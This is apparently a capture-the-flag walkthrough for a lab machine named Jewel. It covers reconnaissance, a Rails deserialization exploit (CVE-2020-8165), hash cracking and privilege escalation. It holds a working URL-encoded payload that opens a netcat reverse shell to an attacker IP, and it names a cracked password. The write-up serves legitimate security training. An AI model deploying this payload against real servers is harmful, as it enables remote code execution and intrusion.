I started off with my initial nmap scan:
After looking over the nmap results, we have these two webpages to work with:
Looking through the Git page, I notice some activity from a user named “bill”, so that could be a potential username/email to use in the future. This is his project related to the blog.
When looking at some of the raw info from Bill, I noticed different references to Ruby and Gemfile, which definitely matches the theme of the box:
I really don’t know much about Gemfiles or even Ruby, but I did find a couple sources to read up on them. HERE is a good one.
What it looks like is that a Gemfile is just a little cache of code that Ruby uses as a place to store gems. Gems are dependencies or additional functionalities you can add to a Ruby program.
So we know Bill is using Gems and doing Ruby stuff. I’m going to leave that for now and check out the blog. I signed up for my own account before exploring around.
Here are some of the posts on there.
So I guess Jennifer likes to be crytpic, or maybe she is testing out the blog. A pangram is just a sentence that uses every letter. Bill is also getting in on the weirdness:
This next one seems to be in Latin:
It translates to:
“But I must explain to you how all this mistaken idea of denouncing pleasure and praising pain was born, a complete account of the system, and expound the actual teachings of the great explorer of the truth and will unfold in the master-builder of human happiness. For no one rejects, dislikes, or avoids pleasure itself, because it is pleasure, but because they do not know how to pursue pleasure rationally encounter consequences that are the sorrows of those who have.”
You know, I didn’t really know much about Lorem Ipsum. I thought it was just a bunch of nonsense Latin words people used to fill in space, but because of this box I actually looked into it. The whole thing is a scrambled version of a publication from the philosopher Cicero in 45 AD called “The extreme of good and evil”. It was meant to be a treatise on the theory of ethics. Printers have actually been using it as a source for stand-in text since the 1500s.
Read more HERE if that interests you.
Anyways, back to Jewel. After that side quest, I eventually found a very recent exploit that seemed to work for the version of Ruby that Bill was using (CVE-2020–8165). Find info about it HERE or HERE.
The way I found this exploit was with the help of a website that scans gem files. Check it out HERE.
Just save the Gemfile.lock from the Git page to your own computer and then run it through the website. And yes, I did try a few of the other vulnerabilities, but this was the one that worked for me:
You can use this exploit with the help of Burp Suite. With intercept turned on, head to your user account on the blog. Send an update request, it doesn’t really matter what you send, just hit “update user”.
You should see something like this back at Burp. Send it to the repeater with the action tab, then turn intercept off.
I’m going to be using this part of the exploit from the GitHub page, just slightly modified:
Here is the whole script below with those changes, make sure to adjust your IP and take note of the port.
%04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09%40srcI%22U%60rm+%2Ftmp%2Ff%3Bmkfifo%20%2ftmp%2ff%3bcat%20%2ftmp%2ff%7c%2fbin%2fsh+-i+2%3e%261%7cnc+10.10.14.69+4444+%3e%2Ftmp%2ff%60%06%3A%06ET%3A%0E%40filenameI%22%061%06%3B%09T%3A%0C%40linenoi%06%3A%0C%40method%3A%0Bresult%3A%09%40varI%22%0C%40result%06%3B%09T%3A%10%40deprecatorIu%3A%1FActiveSupport%3A%3ADeprecation%00%06%3B%09T
You want to paste it right into the spot where your username is on the repeater screen (it replaces your username).
Now, set up a listener with netcat real quick:
Send the request in the repeater and then check back at the blog, reload the page.
You should now have a shell back at your listener. Upgrade it and grab the user flag (I don’t know why I changed to the root directory here, just ignore that part).
After this, head to the backups location:
You will see a database dump file. That will actually have the hash for Bill’s password (and Jennifer’s too):
These are bcrypt, so let’s crack them with Hashcat (I used my other VM for this):
OK, I got Bill’s back quickly as “spongebob”, so I will work with this one while Hashcat tries for Jennifer’s in the background.
From here I checked to see what Bill could do on this machine. Looks like he has some sort of two-factor authentication on the account. I remember seeing a Google-Authenticator while I was snooping around the file system earlier:
Here you can see the authenticator.
I threw an authenticator add-on onto the browser I was using so I could grab a code for Bill.
After it’s installed, press the little pencil button and choose manual entry,
This will generate a code, and we can resume what we were trying to do earlier:
With the help of GTFO bins, I found a way to grab root using this information:
I never did get Jennifer’s password.
Happy Hacking! ❤
